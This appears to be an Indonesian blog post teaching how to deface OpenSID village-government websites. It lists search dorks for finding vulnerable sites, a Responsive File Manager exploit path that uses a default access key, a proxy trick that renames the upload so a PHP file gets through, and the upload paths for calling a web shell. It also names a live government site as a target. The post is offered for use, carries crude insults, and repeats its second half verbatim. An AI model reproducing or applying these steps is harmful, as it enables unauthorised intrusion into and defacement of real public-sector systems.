Deface poc RFM SID
Ok guys kali ini kita akan berbagi sedikiy ilmu deface kami yaitu rfm sid
RFM adalah Responsive file manager Yaitu dia tempat penyimpanan / upload file.
Kebanyakan buf rfm sendiri di pragunakan oleh hecker hecker kontol langsung ajah kita buat tutorial nya.
Bahan / persiapan untuk deface
-shell (gak punya shell download disini)
-exploit
-uploadshell (Upload Disini)
-sc depes kalean
-lightweb (download disini)
-SandroProxy (download disini)
-lightweb (download disini)
-SandroProxy (download disini)
Ok pertama kita dork dulu dork fresh yg saga kali tinggal kompas ajg
OpenSid 18.01-pasca OpenSid 18.06-pasca
OpenSid 18.02-pasca OpenSid 18.07-pasca
OpenSid 18.03-pasca OpenSid 18.08-pasca
OpenSid 18.04-pasca OpenSid 18.09-pasca
OpenSid 19.00-pasca OpenSid 19.01-pasca
OpenSid 18.05-pasca OpenSid 19.01-pasca
OpenSid 20.00-pasca 0 itu lu ganti ajah 123456789 se tolol otak lu mikir kaga
OpenSid 18.00-pasca site:go.id
OpenSid 19.00-pasca site:go.id
OpenSid 20.00-pasca site:go.id
OpenSid 18.00-pasca site:go.id
OpenSid 18.00-pasca site:desa.com
OpenSid 18.00-pasca site:com
OpenSid 18.00-pasca site:net
OpenSid 18.00-pasca site:org
OpenSid 18.00-pasca site:id
OpenSid 18.00-pasca site:co.id
OpenSid 18.00-pasca site:xyz
Exploit:/assets/filemanager/dialog.php?akey=GantiKunciDesa
Jika kalean sudah ngedork langsung ajah masukin exploit nya
Jika sudah langsung kita tebas ajah kalean akan masuk kedalam RFM(RESPONSIVE FILE MANAGER)
Jika sudah kalean pencet strip segitiga kalean upload file upload nya dulu
-Tutorial Temper data img
Jika sudah di upload alhasil kaya gono kawan jika ada tanda x brarti gagal upload
Jika sudah kalean langsung ajah ke sandproxy nya untuk temper
Jika sudadh cari ajah filename dan tambahin <? Di depan .php<?.txt pencet segitiga
Tinggal panggil upload nya
/desa/upload/media/namauploader.php
Jika sudah kalean akan kluar uploader dah langsung ajah kalian upload shell kalean jika sudah kalian langsung ajah akses web nya dengan shell kalean panggil nya
/desa/upload/media/namashell.php
Live target :http://rasabou-bolo.bimakab.go.id/
Jika sudah kalean pencet strip segitiga kalean upload file upload nya dulu
-Tutorial Temper data img
Jika sudah di upload alhasil kaya gono kawan jika ada tanda x brarti gagal upload
Jika sudah kalean langsung ajah ke sandproxy nya untuk temper
Jika sudadh cari ajah filename dan tambahin <? Di depan .php<?.txt pencet segitiga
Tinggal panggil upload nya
/desa/upload/media/namauploader.php
Jika sudah kalean akan kluar uploader dah langsung ajah kalian upload shell kalean jika sudah kalian langsung ajah akses web nya dengan shell kalean panggil nya
/desa/upload/media/namashell.php
Live target :http://rasabou-bolo.bimakab.go.id/
Komentar
Posting Komentar